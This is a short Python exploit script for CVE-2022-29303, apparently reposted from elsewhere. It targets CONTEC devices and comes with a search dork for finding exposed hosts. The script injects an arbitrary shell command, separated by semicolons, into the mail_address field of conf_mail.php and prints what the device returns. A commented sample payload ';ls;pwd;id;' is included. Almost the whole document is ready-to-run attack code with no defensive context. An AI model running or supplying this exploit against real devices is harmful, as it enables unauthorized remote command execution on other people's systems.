CVE-2022-29303-捡来的

#Dork : "Copyright(C) 2007-2014 CONTEC.CO.,LTD. All rights reserved"
import sys
import base64
import requests
import argparse
import urllib.parse
from bs4 import BeautifulSoup


parser = argparse.ArgumentParser(
    prog="CVE-2022-29303.py",
    description="Example : python3 %(prog)s -u https://127.0.0.1 -c 'ls'",
    epilog="Zoomeye Dork : \"Copyright(C) 2007-2014 CONTEC.CO.,LTD. All rights reserved\"\n"
)
parser.add_argument("-u", dest="url", help="Specify target URL")
parser.add_argument("-c", dest="command", help="Specify Command")

args = parser.parse_args()

banner = (
    "ICAgX19fX18gICBfX19fXyAgIF9fXyBfXyBfX18gX19fICAgX19fIF9fXyBfX19fIF9fIF9fX18K"
    "ICAvIF9fXCBcIC8gLyBfX3xffF8gICkgIFxfICApXyAgKV98XyAgKSBfIFxfXyAvLyAgXF9fIC8K"
    "IHwgKF9fIFwgViAvfCBffF9fXy8gLyAoKSAvIC8gLyAvX19fLyAvXF8sIC98XyBcICgpIHxfIFwK"
    "ICBcX19ffCBcXy8gfF9fX3wgL19fX1xfXy9fX18vX19ffCAvX19ffC9fL3xfX18vXF9fL19fXy8K"
    "CgkgICAgICAgQ29kZWQgQnkgVmFsZW50aW4gTG9ic3RlaW4KICAgICAgICJXaXRoIGdyZWF0IHBv"
    "d2VyIGNvbWVzIGdyZWF0IHJlc3BvbnNpYmlsaXR5Igo="
)


def main():
    print("\n" + base64.b64decode(banner).decode("utf-8"))
    print('\nPlease wait... ')
    if None in vars(args).values():
        parser.print_help()
        sys.exit()
    else:
        url = args.url
        command = urllib.parse.quote_plus('uselesscommand;' + args.command + ';id;')
        cleantext=[]
        if not '://' in url:
            url = f'https://{url}'    


    headers = {
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
        'Accept-Language': 'en-US,en;q=0.5',
        'Content-Type': 'application/x-www-form-urlencoded',
        'Origin': url,
        'Connection': 'close',
        'Referer': f'{url}/conf_mail.php',
        'Upgrade-Insecure-Requests': '1',
    }

    #data = 'mail_address=%3bls%3bpwd%3bid%3b&button=%83%81%81%5B%83%8B%91%97%90M'

    data = f'mail_address={command}&button=%83%81%81%5B%83%8B%91%97%90M'
    response = requests.post(f'{url}/conf_mail.php', headers=headers, data=data,verify=False)

    text = BeautifulSoup(response.text, "lxml").text
    text = text.splitlines()

    for line in text:
        if line == '':
            break
        cleantext.append(line)
    cleantext = '\n'.join(cleantext)
    print(cleantext)


if __name__ == "__main__":
    main()